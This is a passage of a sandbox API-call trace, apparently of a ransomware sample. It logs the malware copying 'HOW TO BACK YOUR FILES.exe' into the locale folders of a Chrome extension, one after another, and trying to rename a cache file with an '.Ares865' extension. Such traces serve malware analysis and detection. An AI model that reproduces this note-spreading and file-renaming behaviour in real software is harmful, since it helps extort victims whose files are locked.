Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru" [0104.994] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.994] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.995] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.995] GetLastError () returned 0x0 [0104.995] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.995] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.995] CloseHandle (hObject=0x120) returned 1 [0104.995] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.995] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827c7720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dda4f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dda4f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.995] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.995] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.996] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro" [0104.996] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.996] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.996] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.997] GetLastError () returned 0x0 [0104.997] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.997] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.997] CloseHandle (hObject=0x120) returned 1 [0104.997] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.997] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827b3ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6ddcb060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ddcb060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.997] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.997] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.997] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT" [0104.997] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.997] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.998] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.998] GetLastError () returned 0x0 [0104.998] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.998] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.998] CloseHandle (hObject=0x120) returned 1 [0104.999] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.999] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827aa260, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6ddcb060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ddcb060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.999] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.999] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.999] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR" [0104.999] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.999] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0105.000] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0105.000] GetLastError () returned 0x0 [0105.000] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0105.000] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0105.000] CloseHandle (hObject=0x120) returned 1 [0105.000] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0105.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827a2d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6ddf11c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ddf11c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0105.000] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0105.000] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0105.001] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl" [0105.001] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0105.001] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0105.001] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0105.002] GetLastError () returned 0x0 [0105.002] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0105.002] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0105.002] CloseHandle (hObject=0x120) returned 1 [0105.002] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0105.002] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8279b800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6ddf11c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ddf11c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0105.002] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0105.002] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0105.002] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl" [0105.002] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0105.002] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0105.003] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0105.003] GetLastError () returned 0x0 [0105.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0105.003] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0105.003] CloseHandle (hObject=0x120) returned 1 [0105.004] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0105.004] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82791bc0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6ddf11c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ddf11c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0105.004] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0105.004] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0105.004] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb" [0105.004] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0105.004] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0105.005] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0105.005] GetLastError () returned 0x0 [0105.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0105.005] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0105.005] CloseHandle (hObject=0x120) returned 1 [0105.005] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0105.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82787f80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6de17320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6de17320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0105.005] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0105.005] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0105.006] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv" [0105.006] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0105.006] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0105.006] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0105.007] GetLastError () returned 0x0 [0105.007] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0105.007] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0105.007] CloseHandle (hObject=0x120) returned 1 [0105.007] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0105.007] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8277e340, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6de17320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6de17320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0105.007] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0105.007] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0105.066] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 133 [0105.066] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.066] GetLastError () returned 0x20 [0105.066] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 155 [0105.066] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Temporary Internet 